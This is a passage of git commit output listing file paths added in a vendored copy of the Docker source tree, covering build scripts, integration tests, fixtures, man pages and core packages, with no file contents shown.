vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go create mode 100644 vendor/github.com/docker/docker/hack/make/README.md create mode 100644 vendor/github.com/docker/docker/hack/make/binary create mode 100644 vendor/github.com/docker/docker/hack/make/binary-client create mode 100644 vendor/github.com/docker/docker/hack/make/binary-daemon create mode 100644 vendor/github.com/docker/docker/hack/make/build-deb create mode 100644 vendor/github.com/docker/docker/hack/make/build-integration-test-binary create mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm create mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo create mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo create mode 100644 vendor/github.com/docker/docker/hack/make/cover create mode 100644 vendor/github.com/docker/docker/hack/make/cross create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-daemon create mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon create mode 100644 vendor/github.com/docker/docker/hack/make/install-script create mode 100755 
vendor/github.com/docker/docker/hack/make/release-deb create mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm create mode 100644 vendor/github.com/docker/docker/hack/make/run create mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos create mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install create mode 100644 vendor/github.com/docker/docker/hack/make/test-docker-py create mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration-cli create mode 100644 vendor/github.com/docker/docker/hack/make/test-integration-shell create mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo create mode 100644 vendor/github.com/docker/docker/hack/make/test-unit create mode 100644 vendor/github.com/docker/docker/hack/make/tgz create mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu create mode 100755 vendor/github.com/docker/docker/hack/make/update-apt-repo create mode 100644 vendor/github.com/docker/docker/hack/make/win create mode 100755 vendor/github.com/docker/docker/hack/release.sh create mode 100644 vendor/github.com/docker/docker/hack/validate/.swagger-yamllint create mode 100644 vendor/github.com/docker/docker/hack/validate/.validate create mode 100755 vendor/github.com/docker/docker/hack/validate/all create mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata create mode 100755 vendor/github.com/docker/docker/hack/validate/dco create mode 100755 vendor/github.com/docker/docker/hack/validate/default create mode 100755 vendor/github.com/docker/docker/hack/validate/default-seccomp create mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt create mode 100755 vendor/github.com/docker/docker/hack/validate/lint create mode 100755 vendor/github.com/docker/docker/hack/validate/pkg-imports create mode 100755 vendor/github.com/docker/docker/hack/validate/swagger create mode 100755 
vendor/github.com/docker/docker/hack/validate/swagger-gen create mode 100755 vendor/github.com/docker/docker/hack/validate/test-imports create mode 100755 vendor/github.com/docker/docker/hack/validate/toml create mode 100755 vendor/github.com/docker/docker/hack/validate/vendor create mode 100755 vendor/github.com/docker/docker/hack/validate/vet create mode 100755 vendor/github.com/docker/docker/hack/vendor.sh create mode 100644 vendor/github.com/docker/docker/image/fs.go create mode 100644 vendor/github.com/docker/docker/image/fs_test.go create mode 100644 vendor/github.com/docker/docker/image/image.go create mode 100644 vendor/github.com/docker/docker/image/image_test.go create mode 100644 vendor/github.com/docker/docker/image/rootfs.go create mode 100644 vendor/github.com/docker/docker/image/spec/v1.1.md create mode 100644 vendor/github.com/docker/docker/image/spec/v1.2.md create mode 100644 vendor/github.com/docker/docker/image/spec/v1.md create mode 100644 vendor/github.com/docker/docker/image/store.go create mode 100644 vendor/github.com/docker/docker/image/store_test.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/load.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/save.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/tarexport.go create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1.go create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/benchmark_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/check_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go create mode 100644 
vendor/github.com/docker/docker/integration-cli/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_test.go create mode 100644 
vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go 
create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go create mode 100644 
vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go create mode 100644 
vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go 
create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/events_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml create mode 
100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh create mode 100644 
vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe.go create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go create mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_exec.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go create mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go create mode 100644 vendor/github.com/docker/docker/layer/empty.go create mode 100644 vendor/github.com/docker/docker/layer/empty_test.go create mode 100644 vendor/github.com/docker/docker/layer/filestore.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_test.go create 
mode 100644 vendor/github.com/docker/docker/layer/layer.go create mode 100644 vendor/github.com/docker/docker/layer/layer_store.go create mode 100644 vendor/github.com/docker/docker/layer/layer_store_windows.go create mode 100644 vendor/github.com/docker/docker/layer/layer_test.go create mode 100644 vendor/github.com/docker/docker/layer/layer_unix.go create mode 100644 vendor/github.com/docker/docker/layer/layer_unix_test.go create mode 100644 vendor/github.com/docker/docker/layer/layer_windows.go create mode 100644 vendor/github.com/docker/docker/layer/migration.go create mode 100644 vendor/github.com/docker/docker/layer/migration_test.go create mode 100644 vendor/github.com/docker/docker/layer/mount_test.go create mode 100644 vendor/github.com/docker/docker/layer/mounted_layer.go create mode 100644 vendor/github.com/docker/docker/layer/ro_layer.go create mode 100644 vendor/github.com/docker/docker/layer/ro_layer_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go create 
mode 100644 vendor/github.com/docker/docker/libcontainerd/process_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go create mode 100644 vendor/github.com/docker/docker/man/Dockerfile create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x create mode 100644 vendor/github.com/docker/docker/man/README.md create mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md create mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-create.1.md create mode 100644 
vendor/github.com/docker/docker/man/docker-diff.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rename.1.md create mode 100644 
vendor/github.com/docker/docker/man/docker-restart.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md create mode 100644 vendor/github.com/docker/docker/man/docker.1.md create mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md create mode 100644 vendor/github.com/docker/docker/man/generate.go create mode 100755 vendor/github.com/docker/docker/man/generate.sh create mode 100644 vendor/github.com/docker/docker/man/glide.lock create mode 100644 vendor/github.com/docker/docker/man/glide.yaml create mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1.go create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1_test.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_linux.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go create mode 100644 vendor/github.com/docker/docker/oci/devices_linux.go create 
mode 100644 vendor/github.com/docker/docker/oci/devices_unsupported.go create mode 100644 vendor/github.com/docker/docker/oci/namespaces.go create mode 100644 vendor/github.com/docker/docker/opts/hosts.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_test.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_unix.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_windows.go create mode 100644 vendor/github.com/docker/docker/opts/ip.go create mode 100644 vendor/github.com/docker/docker/opts/ip_test.go create mode 100644 vendor/github.com/docker/docker/opts/mount.go create mode 100644 vendor/github.com/docker/docker/opts/mount_test.go create mode 100644 vendor/github.com/docker/docker/opts/opts.go create mode 100644 vendor/github.com/docker/docker/opts/opts_test.go create mode 100644 vendor/github.com/docker/docker/opts/opts_unix.go create mode 100644 vendor/github.com/docker/docker/opts/opts_windows.go create mode 100644 vendor/github.com/docker/docker/opts/port.go create mode 100644 vendor/github.com/docker/docker/opts/port_test.go create mode 100644 vendor/github.com/docker/docker/opts/quotedstring.go create mode 100644 vendor/github.com/docker/docker/opts/quotedstring_test.go create mode 100644 vendor/github.com/docker/docker/opts/secret.go create mode 100644 vendor/github.com/docker/docker/opts/secret_test.go create mode 100644 vendor/github.com/docker/docker/pkg/README.md create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser.go create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/README.md create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_other.go create 
mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_other.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/example_changes.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/utils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/whiteouts.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/wrap.go create mode 100644 
vendor/github.com/docker/docker/pkg/archive/wrap_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/plugin.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/response.go create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go create mode 100644 